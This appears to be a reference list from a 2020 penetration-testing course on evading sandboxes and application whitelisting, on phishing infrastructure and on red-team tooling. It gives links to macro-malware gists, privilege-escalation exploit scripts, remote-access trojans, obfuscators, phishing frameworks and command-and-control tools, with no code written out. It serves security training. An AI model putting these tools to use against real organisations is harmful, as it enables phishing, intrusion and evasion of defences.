PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.354
1.7.6 Evading Sandboxes and Application Whitelisting
selector
http://www.dkim.org/info/dkim-faq.html#technical
DMARC
http://en.wikipedia.org/wiki/DMARC
Macro leveraging ActiveX controls (for code execution) and WMI Scripting
Library
https://gist.github.com/anonymous/70939438968194d2b0f4d5d2cc53c45e
WshShell Object
https://msdn.microsoft.com/en-us/library/aew9yb99(v=vs.84).aspx
IntPtr.Size Property
https://msdn.microsoft.com/en-us/library/system.intptr.size(v=vs.110).aspx
Macro leveraging ActiveX controls (for code execution) and WMI Scripting
Library
https://gist.github.com/anonymous/0e1abbf9364380294b5d9004e1d68213
Certutil
https://technet.microsoft.com/en-us/library/cc732443(v=ws.11).aspx
MSXML1
https://msdn.microsoft.com/en-us/library/ms763742(v=vs.85).aspx
Macro malware that retrieves the OS (Windows or OSX) and executes the
appropriate payload
https://gist.github.com/anonymous/db37338ba9c59336a0ee3d324d152bc9
EmPyre
https://github.com/EmpireProject/EmPyre
metasploit-loader
https://github.com/rsmudge/metasploit-loader/blob/master/src/main.c
file2vbscript
http://www.didierstevens.com/files/software/file2vbscript_v0_3.zip
PowerShell malware
https://gist.github.com/anonymous/d0da355e5c21a122866808d37234cd5d
VBad
https://github.com/Pepitoh/Vbad
MS16-032
https://web.archive.org/web/20161110175230/https://technet.microsoft.com/en-
us/library/security/ms16-032.aspx
Invoke-MS16-032
https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Invoke-MS16-032.ps1
JSRat-Py
https://github.com/Hood3dRob1n/JSRat-Py
Out-CHM functionality
https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1
nishang
https://github.com/samratashok/nishang
unicorn
https://github.com/trustedsec/unicorn
demiguise
https://github.com/nccgroup/demiguise
Javascript Obfuscator
http://javascriptobfuscator.com/
phishery
https://github.com/ryhanson/phishery
#OLEOutlook - bypass almost every Corporate security control with a point’n’click GUI
https://medium.com/@networksecurity/oleoutlook-bypass-almost-every-corporate-security-control-
with-a-point-n-click-gui-37f4cbc107d0
Down the Rabbit Hole: Extracting Maliciousness from MSG Files Without Outlook
https://www.trustwave.com/Resources/SpiderLabs-Blog/Down-the-Rabbit-Hole--Extracting-
Maliciousness-from-MSG-Files-Without-Outlook/
Powershell IE backdoor
https://khr0x40sh.wordpress.com/2014/08/22/powershell-ie-backdoor/
beacon.ps1
https://gist.github.com/anonymous/286688913bffa163f3c761cb123e3627
c2.php
https://gist.github.com/anonymous/e547d692d956396b6d37fdb74c7a6417
Navigate2 method
https://msdn.microsoft.com/en-us/library/aa752094(v=vs.85).aspx
ConsoleApplication
https://gist.github.com/anonymous/41a0cc1f3f5434e12a018f2b2e71bd81
PowerPick
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick
PowerSploit
https://github.com/PowerShellMafia/PowerSploit
Justin Warner
http://www.sixdub.net/
ConsoleApplication2
https://gist.github.com/anonymous/759516440b9beaaf3e5a9b9f91531251
LostPass
https://www.seancassidy.me/lostpass.html
Google Open URL Redirection Vulnerability which does the Social Engineering part too.
https://vagmour.eu/google-open-url-redirection/
capture_and_redirect.js
https://gist.github.com/anonymous/3bf8342c76eba4da3f660cbffa24f5d8
jquery.ba-hashchange.min.js
https://gist.github.com/anonymous/950a70cdebd3e78b6e88312fa7d93250
HTML Encrypter
http://www.webtoolhub.com/tn561359-html-encrypter.aspx
Javascript Obfuscator
http://javascriptobfuscator.com/
AES Javascript
https://gist.github.com/ianpurton/1122562
aes_js_encrypt.html
https://gist.github.com/anonymous/315be2adc72603005d7c7b176c163ed7
aes_js_decrypt.html
https://gist.github.com/anonymous/e749f1b8fcbdb08b9d709eb1df8b9575
Bypassing the patch to continue spoofing the address bar and the Malware
Warning (IE)
https://www.brokenbrowser.com/bypass-the-patch-to-keep-spoofing-the-address-bar-with-the-malware-
warning/
Unicode Domains are bad
https://www.vgrsec.com/post20170219.html
Click HERE to return to Slide 203 PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.372
References
Phishing with Unicode Domains
https://www.xudongz.com/blog/2017/idn-phishing/
Cross-Site Request Forgery & Cross-Site Scripting in Contact Form Manager WordPress Plugin
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery___cross_site_scripting_in_contact_form
_manager_wordpress_plugin.html
Pafish Macro
https://github.com/joesecurity/pafishmacro
Will it blend? This is the Question, new Macro based Evasions spotted
https://www.joesecurity.org/blog/4978232240698722172
ExpiredDomains
https://expireddomains.net/
Virustotal
https://www.virustotal.com/gui/home/url
Bluecoat
https://sitereview.bluecoat.com/#/
DomainHunter
https://github.com/threatexpress/domainhunter
DNSChecker
https://dnschecker.org/
Click HERE to return to slide 248. PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.375
References
GoPhish
https://getgophish.com
Phishing Frenzy
https://www.phishingfrenzy.com/
King Phisher
https://github.com/securestate/king-phisher
Postfix-Server-Setup
https://github.com/adoreste/Postfix-Server-Setup
MX Toolbox
https://mxtoolbox.com
autossh
https://linux.die.net/man/1/autossh
cat-sites
https://github.com/audrummer15/cat-sites
NGINXConfig
https://nginxconfig.io/
Module ngx_http_proxy_module
http://nginx.org/en/docs/http/ngx_http_proxy_module.html
OpenSSH server
https://infosec.mozilla.org/guidelines/openssh.html
Muraena
https://conference.hitb.org/hitbsecconf2019ams/materials/D2T1%20-%20Muraena%20-
%20The%20Unexpected%20Phish%20-%20Michele%20Orru%20&%20Giuseppe%20Trotta.pdf
reverseshell.xml
https://github.com/giMini/PowerMemory/blob/master/RWMC/misc/reverseshell.xml
SILENTTRINITY Actions
https://github.com/byt3bl33d3r/SILENTTRINITY/actions
Seatbelt
https://github.com/GhostPack/Seatbelt
GhostPack
https://github.com/GhostPack
Covenant
https://github.com/cobbr/Covenant
DotNetToJScript
https://github.com/tyranid/DotNetToJScript
SharpSploit
https://github.com/cobbr/SharpSploit
Rubeus
https://github.com/GhostPack/Rubeus
Shellcode_to_sylk
https://github.com/outflanknl/Scripts/blob/master/shellcode_to_sylk.py
SharpShooter / excel4.py
https://github.com/mdsecactivebreach/SharpShooter/blob/master/modules/excel4.py
WriteProcessMemory function
https://docs.microsoft.com/en-us/windows/desktop/api/memoryapi/nf-memoryapi-
writeprocessmemory
Spoofing-Office-Macro
https://github.com/christophetd/spoofing-office-macro/blob/master/macro.vba
EvilClippy
https://github.com/outflanknl/EvilClippy
Mono
https://www.mono-project.com/docs/about-mono/languages/csharp/
Impacket’s smbserver
https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbserver.py
MaliciousMacroGenerator
https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator/tree/master